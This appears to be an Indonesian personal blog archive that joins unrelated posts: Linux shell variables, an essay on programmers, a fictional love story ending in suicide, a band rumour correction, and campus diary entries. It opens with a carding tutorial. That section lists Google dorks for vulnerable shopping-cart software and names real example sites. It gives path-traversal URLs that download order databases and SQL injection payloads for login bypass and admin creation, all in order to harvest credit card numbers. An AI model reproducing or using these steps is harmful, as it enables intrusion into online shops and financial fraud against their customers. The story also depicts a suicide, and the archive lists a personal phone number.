BernadSatriani belajar ngetik

Metacart
Ktik –> allinurl:/metacart/
Contoh target : www.imagexpres.com/metacart/moreinfo.asp
Hapus moreinfo.asp dan ganti dengan –> /database/metacart.mdb
Hasilnya : /www.imagexpres.com/metacart/database/metacart.mdb
Kalo udah download file tsb dan buka pake Microsoft Acces
Cari aja CCnya, kalo ga ada berarti blm beruntung. Cari target laen.

Shopadmin
Ketik –> allinurl:/shopadmin.asp
Contoh target : www.partsupply.in.th/shopadmin.asp
Trus masukin user sama passwordnya pake SQL Injection.
user : ‘or’1
pass : ‘or’1
Buka filenya satu persatu dan cari CCnya. Kalo ga ada, cari target laen.

Index CGI
Ketik –> allinurl:/store/index.cgi/page=
Contoh target : www.cashwells.com/cgi-bin/store/index.cgi?page=Repair_Manuals.htm
Hapus Repair_Manuals.htm dan ganti dengan –> ../admin/files/order.log
Hasilnya:www.cashwells.com/cgi-bin/store/index.cgi?page=../admin/files/order.log

DCShop
Ketik –> allinurl:/DCShop/
Contoh : www.contoh.com/blabla/DCShop/blabla
Hapus /DCShop/blabla dan ganti dengan –> /DCShop/orders/orders.txt atau /DCShop/Orders/orders.txt
Hasilnya : www.contoh.com/blabla/DCShop/orders/orders.txt

commerceSQL
Ketik –> allinurl:/commercesql/
Contoh : www.contoh.com/commercesql/blabla
Hapus commercesql/blabla dan ganti dengan –>
cgi-bin/commercesql/index.cgi?page=
Hasilnya : www.contoh.com/cgi-bin/commercesql/index.cgi?page=
Untuk melihat admin config –>
www.contoh.com/cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl
Untuk melihat admin manager –>
www.contoh.com/cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi
Untuk melihat file log/CCnya –>
www.contoh.com/cgi-bin/commercesql/index.cgi?page=../admin/files/order.log

PDshopro
Ketik –> allinurl:/shop/category.asp/catid=
Contoh : www.contoh.com/shop/category.asp/catid=blabla
Hapus /shop/category.asp/catid=blabla dang anti dengan –> /admin/dbsetup.asp
Hasilnya : www.contoh.com/admin/dbsetup.asp
Dari keterangan diatas , kita dapati file databasenya dgn nama sdatapdshoppro.mdb
Download file sdatapdshoppro.mdb dengan merubah url nya menjadi www.contoh.com/data/pdshoppro.mdb
Buka file tsb pakai Microsoft Acces

EShop
Ketik –> allinurl:/eshop/
Contoh : www.contoh.com/blabla/eshop
Hapus /eshop dan ganti dengan –> /cg-bin/eshop/database/order.mdb
Hasilnya : www.contoh.com/…/cg-bin/eshop/database/order.mdb
Download file *.mdb nya dan buka pake Microsoft Acces

Cart32 v3.5a
Ketik –> allinurl:/cart32.exe/
Contoh : www.wideopen.net/wrburns_s/cgi-bin/cart32.exe/NoItemFound
Ganti NoItemFound dengan –> error
Bila kita mendapati page error dg keterangan instalasi dibawahnya, berarti kita sukses!
Sekarang, kita menuju pada keterangan di bawahnya, geser halaman kebawah, dan cari bagian Page Setup and Directory
Kalau dibagian tersebut terdapat list file dgn format/akhiran .c32 berarti di site tsb. terdapat file berisi data cc
Copy salah satu file .c32 yg ada atau semuanya ke notepad atau program text editor lainnya.
Ganti string url tsb. menjadi seperti ini : http://www.wideopen.net/wrburns_s/cgi-bin/cart32/
Nah.., paste satu per satu, file .c32 ke akhir url yg sudah dimodifikasi tadi, dengan format
http://www.contoh.com/cart32/
Contoh http://www.wideopen.net/wrburns_s/cgi-bin/cart32/WRBURNS-001065.c32

VP-ASP Shopping Cart 5.0 Cara II
Ketik –> allinurl:/vpasp/shopdisplayproducts.asp
Buka url target dan tambahkan string berikut di akhir bagian shopdisplayproducts.asp
Contoh :
http://…/vpasp/shopdisplayproducts.asp?cat=qwerty’%20union%20select%20fldauto,
fldpassword%20from%20tbluser%20where%20fldusername=
‘admin’%20and%20fldpassword%20like%20′a%25′–
Gantilah nilai dari string url terakhir dg:
%20′a%25′–
%20′b%25′–
%20′c%25′–
Kalau berhasil, kita akan mendapatkan informasi username dan password admin
Untuk login admin ke http://…/vpasp/shopadmin.asp
Cari sendiri CCnya

VP-ASP Shopping Cart 5.0
Ketik –> allinurl:/vpasp/shopsearch.asp
Buka url target dan utk membuat admin baru, postingkan data berikut satu per satu pada bagian search engine :
Keyword=&category=5); insert into tbluser (fldusername) values
(”)–&SubCategory=&hide=&action.x=46&action.y=6
Keyword=&category=5); update tbluser set fldpassword=” where
fldusername=”–&SubCategory=All&action.x=33&action.y=6
Keyword=&category=3); update tbluser set fldaccess=’1′ where
fldusername=”–&SubCategory=All&action.x=33&action.y=6
Jangan lupa untuk mengganti dan nya terserah kamu.
Untuk mengganti password admin, masukkan keyword berikut :
Keyword=&category=5); update tbluser set fldpassword=” where
fldusername=’admin’–&SubCategory=All&action.x=33&action.y=6
Untuk login admin, ada di http://…/vpasp/shopadmin.asp

Lobby.asp
Lobby.asp Ketik –> allinurl: Lobby.asp
Contoh : www.contoh.com/mall/lobby.asp
Hapus tulisan mall/lobby.asp dan ganti dengan –> fpdb/shop.mdb
Hasilnya : www.contoh.com/fpdb/shop.mdb

Proddetail.asp
Ketik –> allinurl:proddetail.asp?prod=
Contoh : www.msasnow.org/proddetail.asp?prod=ACSASledRaffle
Hapus tulisan proddtail.asp?prod=SG369 dan ganti dengan –> fpdb/vsproducts.mdb
Hasilnya : www.msasnow.org/fpdb/vsproducts.mdb

Shopper.cgi
Ketik –> allinurl: /cgi-local/shopper.cgi
Contoh : www.target.com/cgi-local/shopper.cgi/?preadd=action&key=
Tambah dengan –> …&template=order.log
Hasilnya : www.target.com/cgi-local/shopper.cgi?preadd=action&key=…&template=order.log

Digishop
Ketik –> inurl:”/cart.php?m=”
Contoh : http://uniquescrapbooks.com.au/store/cart.php?m=view.
Hapus tulisan cart.php?m=view dan ganti dengan –>admin
Hasilnya http://uniquescrapbooks.com.au/store/admin
Trus masukin username sama pass nya pake SQL injection
Usename : ‘or”=”
Password : ‘or”=”
Buka filenya satu persatu, kalo ga ada CCnya cari target laen.

1. kita gunakan dari bugs webshop Sunshop
google dork : “Powered by SunShop 3.2″
Atau google dork : inurl:”/sunshop/index.php?action=”
Bugs : ganti kata index.php dgn admin
kl ada peringatan java script error klik “OK” aja
Contoh buat kalian : http://www.dohertysgym.com/sunshop/index.php
ganti dengan admin http://www.dohertysgym.com/sunshop/admin
Login pake SQL Injection :
Username : admin
Password :’or”=’

Tonight, my friend in singapore has ask me about linux shell variable.. Hm… come my opinion, variable shell dalam linux tuh likes $cwd, $PWD, $path, $PATH, $term, $TERM. Jadi untuk lebih yakinnya gw langsung googling ajah…

System Unix ato LInux sebenarnya mempunyai banyak perbedaan shell, tetapi pada penerapannya hampir sama semua. Ada 2 shell yang vamiliar ato popular in Unix/Linux, yaitu tcsh and bash. In Linux Shell, there are two types of variable. There are System variables and User defined variables (UDV). If on System variables, created and maintained by Linux itself. This type of variable defined in CAPITAL LETTERS. And on User defined variables (UDV, created and maintained by user. This type of variable defined in lower letters.

You can see system variables by giving command like $ set, some of the important System variables are :

BASH=/bin/bash >> [ Our shell name]
BASH_VERSION=1.14.7(1) >> [ Our shell version name ]
COLUMNS=80 >> [ No. of columns for our screen ]
HOME=/home/vivek >> [ Our home directory ]
LINES=25 >> [ No. of columns for our screen ]
LOGNAME=students >> [ students Our logging name ]
OSTYPE=Linux >> [ Our Os type ]
PATH=/usr/bin:/sbin:/bin:/usr/sbin >> [ Our path settings ]
PS1=[\u@\h \W]\$ >> [ Our prompt settings ]
PWD=/home/students/Common >> [ Our current working directory ]
SHELL=/bin/bash >> [ Our shell name ]
USERNAME=vivek >> [ User name who is currently login to this PC

There are some Linux System Variable..But itu semua tergantung pada setting that can be different in your PC/Linux environment.

Untuk melihat system variablenya, ketik pada console : $ set

You can easily view all the environmental variables in the current session with the env command, type env,

$ env

TERM=vt102
SHELL=/bin/bash
SSH_CLIENT=192.168.2.1 54620 22
OLDPWD=/export/home/oracle
SSH_TTY=/dev/pts/1
USER=oracle
MAIL=/var/mail//oracle
PATH=/usr/bin:/usr/ucb:/etc:.
PWD=/u01
TZ=US/Eastern
PS1=$
SHLVL=1
HOME=/export/home/oracle
LOGNAME=oracle
SSH_CONNECTION=192.168.2.1 54620 192.168.2.100 22
_=/usr/bin/env

Itu semua variable defaultnya.

Source:

My Genius Brain :p

www.lifeaftercoffee.com

http://heather.cs.ucdavis.edu

www.freeos.com

Pernahkah anda punya rekan yang bisa pemrograman komputer tapi tidak berlatar belakang informatika/sejenisnya? Saya punya. Mulai dari programmer yang copy paste source code sampai dengan yang mampu bikin class sendiri juga ada. Disisi lain saya juga memiliki teman dengan latar belakang informatika namun kemampuan codingnya sama seperti rekan saya yang otodidak, bahkan ada yang mengaku lulusan informatika namun tidak mampu melakukan coding program.

Saya punya teman, pintar, logic programmingnya oke, menguasai lebih dari satu bahasa pemrograman selain itu proses codingnya juga cepat. Kalo disuruh misalnya “Gue butuh program bla.. bla.. bla.., elo bisa buat?” dia langsung jawab “Bisa!”. Tapi, giliran disuruh bikin ER Diagram ataupun DFD dia bingung harus mulai darimana.

Lalu timbul pertanyaan saya, kenapa masih ada lulusan informatika bisa dikalahkan oleh orang-orang otodidak dalam pemrograman? sebegitu mudahkah menjadi seorang programmer? apakah hanya dengan mengetahui logika pemrograman dan syntax-nya maka sudah menjadi seorang programmer? Lalu apa yang membedakan programmer lulusan teknik informatika dan yang otodidak?

Berdasarkan pengalaman saya bertemu dengan programmer otodidak, hampir sebagian besar mengerti pemrograman namun tidak diawali dengan belajar teori-teori dasar pemrograman. Biasanya hal itu akan dipelajari sambil berjalan seiring dengan mencoba beberapa baris kode. Sedangkan dalam dunia pendidikan, AFAIK, sebelum coding diharuskan mengerti terlebih dahulu teori-teori dasar seperti misalnya DFD, ER Diagram, bit, Byte dan lain sebagainya, baru nanti akan melangkah ke pemrogramannya.

Jika anda programmer terlepas apapun latar belakangnya tentu pernah mengalami hal-hal seperti dibawah ini :

Penggunaan beberapa fungsi-fungsi sejenis yang terkadang membingungkan dalam penggunaannya. Seperti misalnya kapan harus menggunakan str_replace dan kapan menggunakan ereg_replace atau kenapa harus strstr daripada preg_match() dalam PHP?
Jika berhubungan dengan field-field database pernahkah penentuan type field berdasarkan alasan yang jelas? Seperti misalnya kenapa harus bigint daripada int atau langsung comot yang paling besar? *mysql style*
Kenapa harus ADO daripada DAO untuk melakukan koneksi ke database *Lha, masih pake VB 6.0? *
Jujur, untuk hal-hal seperti itu kadang saya harus buka buku lagi, ya maklumlah namanya juga programmer pemula dan otodidak pula *ngeles*.

Berkaca dari contoh kasus diatas, lalu apa yang seharusnya membedakan antara programmer otodidak dan programmer berlatar belakang informatika?

Menurut saya yang memiliki latar belakang informatika harus bisa mengungguli yang otodidak dengan menguasai teori-teori dasar ini. Kemampuan seperti menyusun ER Diagram, DFD, bit, Byte, alokasi memori dan hal-hal lainnya harus bisa dikuasai oleh yang berlatar belakang informatika. Bahkan akan lebih bagus jika programmer berlatar belakang informatika mampu menguasai itu semua namun dapat menjelaskannya dengan bahasa yang mudah dimengerti oleh orang lain. Bukan tidak mungkin programmer otodidak akan mempelajari hal seperti itu mengingat resources pemrograman sangat banyak beredar di internet. Ini tantangan yang akan dialami oleh lulusan informatika khususnya para programmer.

Kisah ini terinspirasi oleh kisah ega yang menulis diakhir dari kisah hidupnya.

Hujan masih terlihat menghujani rumah tempat Angel terdiam dikamarnya. Ia memandang jendela kamar tempatnya terdiam melamun berharap pelangi muncul setelah hujan lebar itu menghiasi rumahnya dari balik kaca. Kemudian dari arah jendelanya terlihat seorang pria turun dari motornya dengan keadaan basah kuyub, Angel melihat pria itu seperti berteduh di depan rumahnya dengan kedinginan. Ia masih memperhatikan pria itu dengan sebuah tas gital yang ia lindungin lebih berharga dari tubuhnya dan akhirnya hatinya ibah dan segera keluar dari rumahnya.

Dengan sebuah payung ia mendekati pria itu. Kemudian membuka pintu gerbangnya.

“Masuk yuk, daripada kehujanan..” tawar angel dan pria itu menatapnya dengan tersenyum
“Yakin gapapa.. !” ujar pria itu sopan
“Serius.. dirumah ini gua tinggal sendiri. Ayo!!”

Pria itu pun memarkirkan motornya di halaman rumah Angel yang sederhana. Kemudian angel mengajaknya duduk diruangan teras rumahnya. Mengambilkan sebuah handuk kering untuk mengeringkan sisa sisa hujan. Namun pria itu lebih memilih membersihkan gitalnya kebanding dirinya. Angel hanya tersenyum kecil memperhatikan tingkah pria berkulit putih dan bermata sipit tersebut.

“Kok gitalnya dulu yang di keringin. Bukannya kamu sih?”
“Iya gapapa. Ini nyawa pertama aku. Jadi penting juga!”
“Wow.. emang gital itu buat apa”
“Gua Anton. Gua seorang gitaris band amatiran namanya Superband.”
“Wah.. gitu ya. Pantesan. Denger denger. Seorang pemusik selalu menganggap alat musik sebagai nyawanya. Aku pikir tadinya Cuma rumor, dan ternyata benar ya!”
“Hehehe. Gitulah.. emang kamu bisa main alat musik juga?”
“hm..” Angel terdiam menatap gital klasik yang dimiliki pria tersebut.
“Sedikit bisa main piano, dulu sempat les tapi sekarang uda bodoh kali ya. tapi gital ga bisa deh.. pengen belajar sih, tapi ga ada waktu , sibuk kuliah hahaha!”
“Oh gitu ya.. emangnya kamu kuliah dimana?”
“STIKOM.. deket sini. Bukan asli dari kota ini. Rumahnya ini kontrak. Makanya jangan heran kalau aku sendirian !”
“Hahaha.. gitu ya..!”

Angel kemudian menawarkan secangkir kopi hangat kepada pria itu. Anton begitu tersanjung dengan kabaikan gadis yang baru ia kenal tersebut. Kemudian mereka terlibat pembicaraan yang sulit dipercaya. Dekat dalam pandangan dan perkenalan pertama. Hujan mulai redah. Anton harus segera kembali ke kafe tempat ia bekerja dan ia pun meminta pamit kepada Angel. Angel senang berkenalan dengan pria tersebut.

“Thks, uda kasih tempat buat aku beteduh, jasa kamu pasti aku balas kelak hehe!”
“Idih. Pemusik emang romantis kata katanya. Hm.. gimana kalau kamu ajarin aku main gital aja..!”
“Benar.. wah dengan senang hati aku mau ajarin gadis secantik kamu. Tunggu ya kapan aku sempat pasti aku datang ke tempat kamu.”
“Janji ya..!”
“Janji pasti..!!”

Dan perkenalan itu menjadi awal kedekatan mereka. Setelah itu Anton benar benar menepati janjinya untuk mengajarkan Angel bermain gital dari nol hingga mulai menarik petikan nada dari gital klasik yang dipinjamkan oleh Anton. Angel mulai menyukai musik sejak saat itu. Ia selalu menantikan guru les gital barunya tersebut disetiap kesempatan waktu yang ada. Anton juga pria yang sangat baik dan memberikan kesan yang sempurna dalam waktunya tersebut.
Anton juga melihat sebuah potensi besar dalam lengkingan suara yang dimiliki Angel, kebetulan di dalam bandnya salah satu personel singer memutuskan mundur untuk mencari peluang kerja yang lebih baik daripada menjadi seorang anggota band. Angel sempat ragu untuk menjadi singer dalam kelompok band tersebut. Namun akhirnya dorongan dan semangat yang diberikan oleh Anton membuat ia berani untuk menyatakan dirinya bersedia.

Ternyata, pilihan Anton kepada Angel tidaklah salah. Band mereka mulai banyak menarik minat kafe kafe untuk memberikan porsi konser kepada mereka. Angel mulai giat menjadi singer dan sempat membuat kuliahnya terbelangkalai. Ada hal lain yang ia sembunyikan dalam kebersamaan bandnya. Ia mulai menyadari dirinya jatuh cinta pada Anton. Namun Anton selalu menegaskan kepada seluruh tim untuk menggapai cita cita mereka terlebih dahulu menjadi band sukses ketimpang mengurusi urusan pribadi mereka termasuk cinta.

Kebesaran nama band mereka belum cukup untuk membuat band tersebut masuk dalam dapur rekaman, beberapa kali ditolak oleh pengusaha rekaman. Membuat Anton putus asa. Disaat itulah Angel yang selalu hadir memberikan dorongan, cinta antara mereka tak lagi dapat disembuyikan. Sejak saat itu mereka menjadi sepasang kekasih yang selalu bersama. Dan waktu pun berjalan, seiring mimpi mereka menjadi band sukses juga diikuti oleh kisah cinta mereka yang begitu indah.

Mereka kemudian mengubah nama group tersebut menjadi CARAME. Dengan tambahan dua orang nama yang awalnya hanya bertiga. Kini mereka berjumlah lima orang termasuk Angel, Anton. Nando, Agnes dan Hendra. Dua orang anggota baru itu adalah dua bersaudara Agnes dan Hendra yang mempunyai kemampuan piano ( Agnes) dan Biola (Hendra).lengkaplah personal mereka untuk menggapai secara ulang cita cita mereka.

Mereka berkomitmen untuk menjadi bintang besar,. Dan kesempatan itu terbuka ketika sebuah audisi Band dilakukan dikota mereka. Nando dan Anton adalah sahabat dekat yang selalu bersama sejak kecil. Namun Nando memiliki sebuah kebiasaan yang buruk sehingga memiliki beberapa musuh yang selalu datang untuk mengajaknya berkelahi. Sifatnya yang temperamental selalu membuat masalah dan itu terjadi ketika ia secara tak sengaja berdebat dengan salah satuh anggota band lain yang terlihat iri dengan kesuksesan band Carame. Perdebatan itu menjadi masalah besar pribadi yang tersimpan.

Angel mulai mahir menciptakan lagu dengan gital. Ia juga mulai sering bolos kuliah untuk kepentingan bandnya. Namun ia rela melakukan semau itu demi cita cita dan mimpinya bersama sang kekasih, Anton. Hubungan mereka begitu dekat dan sulit untuk dipisahkan selamanya. Teringat ketika disuatu hari paling indah dalam kenangan hidup mereka. Disaat bersama dalam keadaan romantis.

“Ton, kira kira kalau kita sukses kelak. Kamu punya cita cita apa lagi!” Tanya Angel
“Hehehe. Kamu yakin mau tau..!”
“Iya , apa sih?”
“Aku mau menikah sama kamu, mau jadi suami dari gadis yang aku paling cintai sedunia. Dan itu adalah kamu,, !!”tegas Anton
“Terima kasih ya. Aku juga berharap begitu. Tidak ada pria lain di hidup aku selain kamu. Hanya kamu yang telah membuat hidup aku begitu indah. Kalau pun suatu saat ada yang lain dalam hidup aku. Itu bukan orang lain. Tapi gital ini…” ungkap Angel memperlihatkan gital yang diberikan Anton padanya ketika memulai belajar bermusik
“Hahaha. Kamu ada ada aja. Masa aku disamakan kayak gital.. “
“Kan belajar dari kamu. Ingat kan ketika pertama kali kenalan , kamu bilang gital ini nyawa kedua kamu..”

Mereka pun tertawa dan saling berpelukan.

“Terima kasih ya. Ngel. Mungkin kita adalah takdir paling indah yang diciptakan Tuhan, semoga apa yang kita impikan tidak pernah terpisah walau maut memisakah kita”
“Jika maut memisahkan kita dengan darah, aku pun akan ikut dengan darah. Jika Tuhan memisahkan kita dengan raga. Akupun akan ikut dengan ragamu!”

Anton terdiam mendengarkan kata kata dari wanita itu. Begitu indah namun juga begitu sedih bila untuk diungkapkan.

“Jangan ngomong gitulah.. kesannya aku mau pergi aja hehehe!”

***

Band mereka pun tiba pada waktunya untuk melakukan konser audisi. Mereka telah lolos ke babak final dan bersaing dengan salah satu kandidat yang sempat membuat keributan dengan nando. Mereka telah bersiap di hari final. Angel sedang menghadapi ujian ketika itu. Ia memutuskan untuk pergi dan berangkat sendiri dengan taksi menuju tempat audisi. Sedangkan Anton dan Nando pergi bersama begitu pula dengan dua kakak beradik Agnes dan Hendra.

Perjalanan berjalan baik untuk Angel menuju lokasi audisi. Ketika tiba ia telah ditunggu oleh Agnes dan Hendra. Namun mereka tidak melihat hadirnya Anton dan Nando. Sedangkan band mereka sebentar lagi akan melakukan audisi. Mereka menjadi limpung dan bingung. Nomor telepon kedua anggota band tersebut masih sulit dihubungin. Hingga panggilan konser untuk band mereka hanya memiliki sisa waktu 5 menit. Mereka mulai cemas. Tiba tiba sebuah telepon tersambung ke Hendphone milik Angel.

“Angel ya.. ini aku Nando” kata Nando
“Kalian kemana sih, bukannya cepat datang. Bentar lagi kita uda masuk audisi!”
“Angel maaf, gua minta maaf sekali ini aja!!”
“Maaf kenapa?” Tanya Angel kesal
“aku dan Anton ga bisa datang ke audisi kali ini. Ada urusan mendadak. Ini benar benar penting buat hidup kita. “
“Hah. Tapi band ini tanpa kalian berdua mana jalan?” keluh Angel
“Angel. Kamu tau kan mimpi kita selama ini. Menjadi band besar. Dan inilah kesempatan kita. Jangan gagalkan semuanya hanya karena kita tidak datang. Aku mohon. Sekali ini jangan Tanya kenapa. Teruskan mimpi kita. Aku mohon Angel!” suara isak tangis terdengar dari Nando

Angel terdiam dan mulai curiga dengan tangis tersebut.

“Anton mana..?”
“Anton.. dia.. dia lagi ke toilet. Dia sakit perut. Jadi kamu cepatan audisi dulu. Setelah audisi aku akan telepon kamu lagi.. selamat berjuang ya Angel” Nando menutup telepon itu dan Angel hanya bisa memanggil namun perbincangan itu berakhir.

Angel menatap Agnes dan Hendra. Kemudian ia tak ingin mimpi serta cita cita band mereka berakhir begitu saja. Sekarang ia harus berusaha sendiri berjuang untuk band mereka. Dengan semangat tinggi ia pun masuk keruang audisi. Ia melantunkan sebuah lagu yang menjadi andalan band mereka. Juri sempat bertanya anggota lain yang kurang. Dengan spontan Angel menjawab berhalangan. Namun menyakinkan Juri dengan tiga orang saja mereka dapat melanjutkan audisi tersebut.

Audisi berakhir. Angel membawa kekurangan itu dengan keberhasilan . band mereka menjadi juara. Mereka terlihat gembira memamerkan piala kebesaran mereka. Saling berpelukan. Mimpi indah telah menanti mereka menjadi band sukses. Diantara kegembiraan tersebut. Nando kembali menelepon Angel. Angel dengan gembira menyambut telepon tersebut.

“Nando. Kita juara. Kita juara. Kita bisa jadi band dapur rekaman!!” teriak Angel
“Selamat ya. Ngel. Gua mau jujur sama lo.. Anton kritis. Dia dirawat dirumah sakit Alyo.kalau bisa lo secepatnya kesini!!”
“Apa. Lo ga bercanda kan. Tadi lo bilang dia sakit perut..?”
“Ceritanya panjang. Tapi gua harap lo segera kesini..!!”
“OK.

Hati Angel mulai cemas dan gelisah. Ia segera menuju rumah sakit yang dikatakan oleh Nando. Ketika tiba ia melihat nando mengalami luka memar dengan balutan luka di kepalanya yang bocor karena benda tajam. Ia mulai ketakutan . kemudian di unit gawat darurat terlihat Anton yang sedang tertidur pulas dengan alat Bantu pernafasan dengan beberapa dokter dan suster. Angel tak bertanya banyak kepada Nando ia segera menerobos masuk keruang tersebut. Mendekati Anton sambil berteriak histeris.

Suster dan dokter kemudian bertidak tegas memisakan gadis itu. Terlambat untuk Angel , ia hanya sempat memeluk pria yang ia cintai terakhir kali sesaat nafasnya benar benar berakhir. Tangannya bergetar, dokter mulai melihat pasien kesulitan bernafas ketika Angel datang. Anton sepertinya merasakan kedatangan Angel walau masih tertidur. Angel ditarik keluar dari ruangan. Kemudian Agnes memeluknya dan berusaha memberikan kekuatan untuk sabar.

“Anton kenapa..Anton kenapa.? Kenapa bisa kayak gini?” teriak Angel pada Nando
“Maafin aku Ngel. Ini salah aku. Kalau saja aku ga bikin keributan di perjalan tadi kita ga mungkin kayak gini. Anton tertusuk pisau ketika sedang menolong aku dari perkelahian dengan preman preman di jalan”

Angel terdiam dan berusaha tidak percaya. Ia mulai seperti panic dan tertawa sendiri. Sambil beberapa kali berkata semua hanya sandiwara. Dokter keluar dari pintu UGD dengan wajah penyesalan. Sambil berkata

“Maafkan kami. Pasien mengalami luka yang cukup vital karena tertusuk dibagian leher sehingga menganggu pernafasan. Pasien telah meninggal”

Angel seketika beteriak histeris dan menerobos pintu kemudian mendekati Anton yang telah mendingin.

“Ton. Kalau kamu ga bisa bernafas sendiri biarkan aku memberikan nafas untuk kamu. Jangan pergi tinggalkan aku , Ton. Jangan ton.. “

Akhirnya kisah cinta itu berakhir sebagai kenangan.

***

Angel tak pernah bisa melupakan kisah cintanya pada Anton . ia mencoba bertahan untuk hidup tanpa sang kekasih. Namun bayang bayang dan kenangan sang kekasih selalu hadir dalam hidupnya. Di balik kesedihan yang mendalam. Ia melihat gital yang diberikan Anton sebagai bagian dari hidup Anton yang tersisa. Kemudian mulai memetik satu persatu nada yang akhirnya menciptakan sebuah lagu indah. Ia mulai mengingat janji terakhir pada sang kekasih yang tak pernah ia lupakan.

Agnes dan Hendra begitu gembira , begitu pula Nando ketika , Angel menghubungi mereka untuk siap kembali bernyanyi. Mereka tidak menyia yiakan kebangkitan Angel dari kesedihan, dan mengambil sebuah konser di sebuah kampus. Angel terlihat lebih kurus daripada biasanya. Namun tidak kehilangan naluri untuk bernyanyi dan bermusiknya. Disatu kesempatan besar. , konser mereka diliput oleh berbagai media dan televise. Angel berdiri menghadap penonton dengan penuh ketegaran. Ia mulai teringat satu sisi panggung melihat bayangan Anton yang selalu memberikan senyuman disaat ia bernyanyi.

Di panggung besar tersebut . Angel mulai membuka kata kata terakhirnya.

“lagu ini aku buat ketika dibatas antara aku berusaha untuk bangkit dan mundur. Namun aku percaya. Lagu ini kelak dapat mewakili mimpi band kami untuk menjadi besar. Mimpi untuk menjadi bintang besar. Kupersembahan lagu ini untuk orang tercinta yang telah pergi untuk selamanya..” ujar Angel dengan rauk penuh kesedihan namun tak menangis.

Perlahan penonton konser mulai terdiam mendengarkan deringan petikan gital dan suara Angel yang begitu indah dengan ciptaan lagunya. Ada yang terhanyut hingga menangis. Dan lagu itu pun ditutup dengan sebuah tepuk tangan meriah yang luar biasa. Seorang penguasaha rekamana jatuh cinta pada lagu tersebut. Dan meminta nomor telepon yang dapat menghubungi band Carame.

Angel meminta waktu untuk beristirahat pulang kerumahnya karena kelelahan. Agnes dan kawan kawan membiarkan Angel pergi dari mereka. Namun mereka tak pernah menyadari itu adalah kata kata terakhir Angel. Ketika mereka tiba dirumah Angel untuk membawa kabar gembira kontrak kerja rekaman yang luar biasa. Mereka telah ,menemukan angel dengan tetasan darah ditangan yang kemudian mengakhiri hidupnya dengan selembar lirik yang ia tetap pegang untuk persembahan terakhir hidupnya pada dunia yang akhirnya ia tinggalkan.

Lagu tersebut kemudian menjadi sukses.. dan menyisakan pilu yang sangat mendalam

Tamat

MOHON MAAF BILA TERJADI KETIDAKSENGAJAAN YANG MENYINGGUNG REKAN ATAU SIAPAPUN YANG MENGENAL SANG PENULIS LAGU. SEKALI LAGI INI HANYA FIKSI .TERIMA KASIH SELAMAT MEMBACA KISAH KISAH LAIN DI

Kontroversi berita ini sudah menjadi berita hangat di sejumlah komunitas internet. Ada beberapa orang yang mengatakan bahwa si X ini bernama Egha. Ada pula yang bernama Geby. Tidak sampai situ, dari mana Egha atopun Geby ini berasal pun sampai saat ini masih simpang siur. Ada yang bilang dari Medan, Padang, Jogja, Bandung, Ponorogo dan Bali, padahal lagunya cuman satu. Belum lagi versi ceritanya yang multiple banget. Klo gak percaya silakan lihat disini dan disini juga disini. Untuk download Full Version (4 Versi) lagu Jauh, bisa di download disini .

Namun, kenyataan yang sebenarnya terungkap saat Radio EBS Surabaya mewawancarai vokalis band karamel ini. Ternyata dia tidak mati seperti yang banyak diberitakan saat ini. Itu hanya ulah temennya yang terlalu melebih-lebihkan. Memang benar ia yang menciptakan lagu ini, namun ia tidak mempunyai pikiran apapun untuk bunuh diri. Ia saat ini sedang berada di Makasar untuk melanjutkan Kuliahnya. Jadi, mohon berita kebenaran ini untuk disebar luaskan. Demi menjaga nama baik sang vokalis ini dan juga untuk memberdayakan semboyan “Jangan Mudah Percaya Omongan Lain” dan juga prinsip hidup saya “Mengungkap Kebenaran Dibalik Fakta”. Tapi, omongan saya di artikel ini dapat dipertanggung jawabkan, karena sudah pernah di On Air-kan di EBS FM 105,9 Surabaya.

Contact Person Caramel Band :
Email : caramel_bandku@yahoo.com
Anang : 08563432607 - 03171803014

[ sumberny lupa gw ]

Ga nyangka ternyata birokrasi indonesia yang terkenal ribet n buruk ditiru juga d UII.. Damn it…
Hari jumat waktu batas pembayaran SPP n catur dharma, gw terpaksa jemput temen gw sekitar jam 10. Rencana gw mo langsung ke kampus jam 10.15 bwt rapat n bayar SPP. Ga taunya temen gw masih molor waktu gw jemput, trus akhirnya waktu ke kampus juga molor setelah jumatan. Ga taunya setelah jumatan temen gw malah asik maen game, udah gw maki2 juga ga nyadar tuh bocah… Damn shit. Eh stelah itu malah ditinggal beli ikan hias buat akuariumnya. Ya udah mo gimana lagi. Gw tunggu sambil maen game. Sekitar jam 2 ga disangka hujan turun dengan derasnya. Akhirnya teringat juga dengan jadwal pembayaran yang katanya dead line hari jumat saat itu. Gw udah berpikir kalo hari pertama udah ga bisa ikut ujian.

Hari sabtunya gw coba ke kampus, kali kali aja loket di rektorat masih buka. Lagi lagi gw diminta jemput temen gw itu. Kata dy c hari sabtu loket ga buka. Tapi semalem gw tanya ma temen gw yang lain, hari sabtu tetep buka. Ya udah sabtunya gw jemput temen gw jam 10 an. Lagi lagi molor ampe habis dzuhur.

Ternyata hari sabtu loket tetep buka tapi cuma sampe dzuhur. SUCK. Kenapa gw sial banget. AKhirnya hari senin, hari ujian pertama, gw dateng pagi pagi banget, yah mo ngurus kartu ujian. Ternyata sampe loket fakultas ngantri buanyak banget. Seteleh berdesak desakan gw sampe juga di depan loket. Dengan ga sabar gw teriak ” bu cepet!!”, eh ternyata di bales sama ibu penjaga loket ” ba bu ba bu, ra iso sabar yo!! “

Gw disuruh ke loket rektorat, untuk bayar, karna ga bisa ambil surat ijin masuk n kartu ujian kalo ga ada surat dari dekan. Gw tanya ke loket rektorat, kq malah g bisa n d suruh ke loket yang gw lupa namanya yang letaknya di belakang gedung rektorat. Sampe sana malah d suruh balik ke loket fakultas dan minta surat dispensasi ke dekanat. Anjin*!!

BTAQ..? Beuh, kq kayaknya mendadak banget yach.. Bingung gw mo ngehadepin tes Agama nanti.. Apalagi mentoring gw kagak pernah berangkat, pernah sih pernah, tapi cuma 1 kali aj.. Seharusnya hari ini kamis 20 Maret, gw ikut tes. Tapi karna malamnya udah di niati bwt ga berangkat, yah malamnya gw kagak belajar yang kira2 bakal keluar di tes.

Pagi ini lagi lagi gw bangun kesiangan, yah perhaps gw kecapekan seharian kemaren.

Kira2 jam 09.04, HP gw berdering.. Hm.. SMS dari cp tuh pagi2.. Gw baca tuh sms yang isinya :

“Ass bernad kt ujian BTAQ hr ini, jd dtng ya… Jngn tld bngt…

Skrng sdh di mulai ruang 3/2″

Beuh, ternyata sms dari pembimbing mentor gw.. Haha.. Kasian juga c sbenernya. Beliau udah sering ngingeting gw, tp emang dasarnya gw jg bandel c..

Thx All 4 Mas Hari Darmawan 

